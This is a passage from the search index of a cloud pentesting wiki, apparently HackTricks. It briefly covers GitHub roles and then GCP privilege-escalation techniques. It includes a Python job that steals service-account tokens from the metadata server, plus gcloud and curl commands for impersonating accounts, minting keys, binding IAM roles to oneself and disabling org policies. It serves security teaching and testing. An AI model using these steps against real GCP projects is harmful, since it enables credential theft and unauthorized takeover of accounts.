owned by an organization , an owner can grant them GitHub App manager permissions. Outside collaborators : An outside collaborator is a person who has access to one or more organization repositories but is not explicitly a member of the organization. You can compare the permissions of these roles in this table: https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles","breadcrumbs":"Github Security » Basic Github Information » Organization Roles","id":"104","title":"Organization Roles"},"1040":{"body":"This permission allows to gather credentials for the Kubernetes cluster using something like: bash gcloud container clusters get-credentials --zone Without extra permissions, the credentials are pretty basic as you can just list some resource , but hey are useful to find miss-configurations in the environment. note Note that kubernetes clusters might be configured to be private , that will disallow that access to the Kube-API server from the Internet. If you don\'t have this permission you can still access the cluster, but you need to create your own kubectl config file with the clusters info. A new generated one looks like this: yaml apiVersion: v1\\nclusters: - cluster: certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K server: https://34.123.141.28 name: gke_security-devbox_us-central1_autopilot-cluster-1\\ncontexts: - context: cluster: gke_security-devbox_us-central1_autopilot-cluster-1 user: gke_security-devbox_us-central1_autopilot-cluster-1 name: gke_security-devbox_us-central1_autopilot-cluster-1\\ncurrent-context: gke_security-devbox_us-central1_autopilot-cluster-1\\nkind: Config\\npreferences: {}\\nusers: - name: gke_security-devbox_us-central1_autopilot-cluster-1 user: auth-provider: config: access-token: cmd-args: config config-helper --format=json cmd-path: gcloud expiry: \\"2022-12-06T01:13:11Z\\" expiry-key: \\"{.credential.token_expiry}\\" token-key: \\"{.credential.access_token}\\" name: gcp","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.clusters.get","id":"1040","title":"container.clusters.get"},"1041":{"body":"Kubernetes by default prevents principals from being able to create or update Roles and ClusterRoles with more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update Roles/ClusterRoles with more permissions that ones he held, effectively bypassing the Kubernetes protection against this behaviour. container.roles.create and/or container.roles.update OR container.clusterRoles.create and/or container.clusterRoles.update respectively are also necessary to perform those privilege escalation actions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.roles.escalate | container.clusterRoles.escalate","id":"1041","title":"container.roles.escalate | container.clusterRoles.escalate"},"1042":{"body":"Kubernetes by default prevents principals from being able to create or update RoleBindings and ClusterRoleBindings to give more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update RolesBindings/ClusterRolesBindings with more permissions that ones he has, effectively bypassing the Kubernetes protection against this behaviour. container.roleBindings.create and/or container.roleBindings.update OR container.clusterRoleBindings.create and/or container.clusterRoleBindings.update respectively are also necessary to perform those privilege escalation actions.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.roles.bind | container.clusterRoles.bind","id":"1042","title":"container.roles.bind | container.clusterRoles.bind"},"1043":{"body":"All these permissions are going to allow you to create or update a resource where you can define a pod . Defining a pod you can specify the SA that is going to be attached and the image that is going to be run , therefore you can run an image that is going to exfiltrate the token of the SA to your server allowing you to escalate to any service account. For more information check: As we are in a GCP environment, you will also be able to get the nodepool GCP SA from the metadata service and escalate privileges in GC P (by default the compute SA is used).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update","id":"1043","title":"container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update"},"1044":{"body":"As explained in this page , with these permissions you can read the tokens of all the SAs of kubernetes , so you can escalate to them.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.secrets.get | container.secrets.list","id":"1044","title":"container.secrets.get | container.secrets.list"},"1045":{"body":"With this permission you will be able to exec into pods , which gives you access to all the Kubernetes SAs running in pods to escalate privileges within K8s, but also you will be able to steal the GCP Service Account of the NodePool , escalating privileges in GCP .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.pods.exec","id":"1045","title":"container.pods.exec"},"1046":{"body":"As explained in this page , with these permissions you can access local services running in pods that might allow you to escalate privileges in Kubernetes (and in GCP if somehow you manage to talk to the metadata service) .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.pods.portForward","id":"1046","title":"container.pods.portForward"},"1047":{"body":"Because of the name of the permission , it looks like that it will allow you to generate tokens of the K8s Service Accounts , so you will be able to privesc to any SA inside Kubernetes. However, I couldn\'t find any API endpoint to use it, so let me know if you find it.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.serviceAccounts.createToken","id":"1047","title":"container.serviceAccounts.createToken"},"1048":{"body":"These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to persist in the cluster . For more information follow this link . tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update","id":"1048","title":"container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update"},"1049":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » GCP Dataproc Privilege Escalation","id":"1049","title":"GCP Dataproc Privilege Escalation"},"105":{"body":"In https://github.com/organizations//settings/member_privileges you can see the permissions users will have just for being part of the organisation . The settings here configured will indicate the following permissions of members of the organisation: Be admin, writer, reader or no permission over all the organisation repos. If members can create private, internal or public repositories. If forking of repositories is possible If it\'s possible to invite outside collaborators If public or private sites can be published The permissions admins has over the repositories If members can create new teams","breadcrumbs":"Github Security » Basic Github Information » Members Privileges","id":"105","title":"Members Privileges"},"1050":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1050","title":"Dataproc"},"1051":{"body":"I was unable to get a reverse shell using this method, however it is possible to leak SA token from the metadata endpoint using the method described below. Steps to exploit Place the job script on the GCP Bucket Submit a job to a Dataproc cluster. Use the job to access the metadata server. Leak the service account token used by the cluster. python import requests metadata_url = \\"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\\"\\nheaders = {\\"Metadata-Flavor\\": \\"Google\\"} def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(\\"access_token\\", \\"\\") print(f\\"Leaked Token: {token}\\") return token except Exception as e: print(f\\"Error fetching metadata token: {e}\\") return None if __name__ == \\"__main__\\": fetch_metadata_token() bash # Copy the script to the storage bucket\\ngsutil cp gs:/// # Submit the malicious job\\ngcloud dataproc jobs submit pyspark gs:/// \\\\ --cluster= \\\\ --region= tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1051","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1052":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Deploymentmaneger Privesc","id":"1052","title":"GCP - Deploymentmaneger Privesc"},"1053":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1053","title":"deploymentmanager"},"1054":{"body":"This single permission lets you launch new deployments of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. You could actually launch any resource listed in gcloud deployment-manager types list In the original research following script is used to deploy a compute instance, however that script won\'t work. Check a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1054","title":"deploymentmanager.deployments.create"},"1055":{"body":"This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) Check a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1055","title":"deploymentmanager.deployments.update"},"1056":{"body":"This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous deploymentmanager.deployments.create section.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1056","title":"deploymentmanager.deployments.setIamPolicy"},"1057":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » References","id":"1057","title":"References"},"1058":{"body":"Reading time: 9 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1058","title":"GCP - IAM Privesc"},"1059":{"body":"Find more information about IAM in: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1059","title":"IAM"},"106":{"body":"By default repository roles are created: Read : Recommended for non-code contributors who want to view or discuss your project Triage : Recommended for contributors who need to proactively manage issues and pull requests without write access Write : Recommended for contributors who actively push to your project Maintain : Recommended for project managers who need to manage the repository without access to sensitive or destructive actions Admin : Recommended for people who need full access to the project , including sensitive and destructive actions like managing security or deleting a repository You can compare the permissions of each role in this table https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role You can also create your own roles in https://github.com/organizations//settings/roles","breadcrumbs":"Github Security » Basic Github Information » Repository Roles","id":"106","title":"Repository Roles"},"1060":{"body":"An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like: bash gcloud iam roles update --project --add-permissions You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update (iam.roles.get)","id":"1060","title":"iam.roles.update (iam.roles.get)"},"1061":{"body":"An attacker with the mentioned permissions will be able to request an access token that belongs to a Service Account , so it\'s possible to request an access token of a Service Account with more privileges than ours. bash gcloud --impersonate-service-account=\\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ auth print-access-token You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1061","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1062":{"body":"An attacker with the mentioned permissions will be able to create a user-managed key for a Service Account , which will allow us to access GCP as that Service Account. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research . Note that iam.serviceAccountKeys.update won\'t work to modify the key of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1062","title":"iam.serviceAccountKeys.create"},"1063":{"body":"If you have the iam.serviceAccounts.implicitDelegation permission on a Service Account that has the iam.serviceAccounts.getAccessToken permission on a third Service Account, then you can use implicitDelegation to create a token for that third Service Account . Here is a diagram to help explain. Note that according to the documentation , the delegation of gcloud only works to generate a token using the generateAccessToken() method. So here you have how to get a token using the API directly: bash curl -X POST \\\\ \'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\'\\"${TARGET_SERVICE_ACCOUNT}\\"\':generateAccessToken\' \\\\ -H \'Content-Type: application/json\' \\\\ -H \'Authorization: Bearer \'\\"$(gcloud auth print-access-token)\\" \\\\ -d \'{ \\"delegates\\": [\\"projects/-/serviceAccounts/\'\\"${DELEGATED_SERVICE_ACCOUNT}\\"\'\\"], \\"scope\\": [\\"https://www.googleapis.com/auth/cloud-platform\\"] }\' You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1063","title":"iam.serviceAccounts.implicitDelegation"},"1064":{"body":"An attacker with the mentioned permissions will be able to sign of arbitrary payloads in GCP . So it\'ll be possible to create an unsigned JWT of the SA and then send it as a blob to get the JWT signed by the SA we are targeting. For more information read this . You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here and here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1064","title":"iam.serviceAccounts.signBlob"},"1065":{"body":"An attacker with the mentioned permissions will be able to sign well-formed JSON web tokens (JWTs) . The difference with the previous method is that instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT . This makes it easier to use but you can only sign JWT instead of any bytes. You can find a script to automate the creation, exploit and cleaning of a vuln environment here and a python script to abuse this privilege here . For more information check the original research .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1065","title":"iam.serviceAccounts.signJwt"},"1066":{"body":"An attacker with the mentioned permissions will be able to add IAM policies to service accounts . You can abuse it to grant yourself the permissions you need to impersonate the service account. In the following example we are granting ourselves the roles/iam.serviceAccountTokenCreator role over the interesting SA: bash gcloud iam service-accounts add-iam-policy-binding \\"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ --member=\\"user:username@domain.com\\" \\\\ --role=\\"roles/iam.serviceAccountTokenCreator\\" # If you still have prblem grant yourself also this permission\\ngcloud iam service-accounts add-iam-policy-binding \\"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" \\\\ \\\\ --member=\\"user:username@domain.com\\" \\\\ --role=\\"roles/iam.serviceAccountUser\\" You can find a script to automate the creation, exploit and cleaning of a vuln environment here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1066","title":"iam.serviceAccounts.setIamPolicy"},"1067":{"body":"The iam.serviceAccounts.actAs permission is like the iam:PassRole permission from AWS . It\'s essential for executing tasks, like initiating a Compute Engine instance, as it grants the ability to \\"actAs\\" a Service Account, ensuring secure permission management. Without this, users might gain undue access. Additionally, exploiting the iam.serviceAccounts.actAs involves various methods, each requiring a set of permissions, contrasting with other methods that need just one. Service account impersonation Impersonating a service account can be very useful to obtain new and better privileges . There are three ways in which you can impersonate another service account : Authentication using RSA private keys (covered above) Authorization using Cloud IAM policies (covered here) Deploying jobs on GCP services (more applicable to the compromise of a user account)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.actAs","id":"1067","title":"iam.serviceAccounts.actAs"},"1068":{"body":"An attacker with the mentioned permissions will be able to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource. According to this interesting post , it\'s necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT. You can generate an OpenIDToken (if you have the access) with: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\\n# Then, generate token\\ngcloud auth print-identity-token \\"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" --audiences=https://example.com Then you can just use it to access the service with: bash curl -v -H \\"Authorization: Bearer id_token\\" https://some-cloud-run-uc.a.run.app Some services that support authentication via this kind of tokens are: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (if using Google OIDC) You can find an example on how to create and OpenID token behalf a service account here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1068","title":"iam.serviceAccounts.getOpenIdToken"},"1069":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » References","id":"1069","title":"References"},"107":{"body":"You can list the teams created in an organization in https://github.com/orgs//teams . Note that to see the teams which are children of other teams you need to access each parent team.","breadcrumbs":"Github Security » Basic Github Information » Teams","id":"107","title":"Teams"},"1070":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1070","title":"GCP - KMS Privesc"},"1071":{"body":"Info about KMS: GCP - KMS Enum Note that in KMS the permission are not only inherited from Orgs, Folders and Projects but also from Keyrings .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1071","title":"KMS"},"1072":{"body":"You can use this permission to decrypt information with the key you have this permission over. bash gcloud kms decrypt \\\\ --location=[LOCATION] \\\\ --keyring=[KEYRING_NAME] \\\\ --key=[KEY_NAME] \\\\ --version=[KEY_VERSION] \\\\ --ciphertext-file=[ENCRYPTED_FILE_PATH] \\\\ --plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1072","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"1073":{"body":"An attacker with this permission could give himself permissions to use the key to decrypt information. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\\ --location [LOCATION] \\\\ --keyring [KEYRING_NAME] \\\\ --member [MEMBER] \\\\ --role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1073","title":"cloudkms.cryptoKeys.setIamPolicy"},"1074":{"body":"Here\'s a conceptual breakdown of how this delegation works: Service Account A has direct access to decrypt using a specific key in KMS. Service Account B is granted the useToDecryptViaDelegation permission. This allows it to request KMS to decrypt data on behalf of Service Account A. The usage of this permission is implicit in the way that the KMS service checks permissions when a decryption request is made. When you make a standard decryption request using the Google Cloud KMS API (in Python or another language), the service checks whether the requesting service account has the necessary permissions . If the request is made by a service account with the useToDecryptViaDelegation permission, KMS verifies whether this account is allowed to request decryption on behalf of the entity that owns the key . Setting Up for Delegation Define the Custom Role : Create a YAML file (e.g., custom_role.yaml) that defines the custom role. This file should include the cloudkms.cryptoKeyVersions.useToDecryptViaDelegation permission. Here\'s an example of what this file might look like: yaml title: \\"KMS Decryption via Delegation\\"\\ndescription: \\"Allows decryption via delegation\\"\\nstage: \\"GA\\"\\nincludedPermissions: - \\"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\\" Create the Custom Role Using the gcloud CLI : Use the following command to create the custom role in your Google Cloud project: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Replace [YOUR_PROJECT_ID] with your Google Cloud project ID. Grant the Custom Role to a Service Account : Assign your custom role to a service account that will be using this permission. Use the following command: bash # Give this permission to the service account to impersonate\\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\\ --member \\"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\\" \\\\ --role \\"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\\" # Give this permission over the project to be able to impersonate any SA\\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\\ --member=\\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\\" \\\\ --role=\\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\\" Replace [YOUR_PROJECT_ID] and [SERVICE_ACCOUNT_EMAIL] with your project ID and the email of the service account, respectively. tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1074","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1075":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1075","title":"GCP - Orgpolicy Privesc"},"1076":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1076","title":"orgpolicy"},"1077":{"body":"An attacker leveraging orgpolicy.policy.set can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint appengine.disableCodeDownload usually blocks downloading of App Engine source code. However, by using orgpolicy.policy.set , an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected. bash # Get info\\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] A python script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1077","title":"orgpolicy.policy.set"},"1078":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert 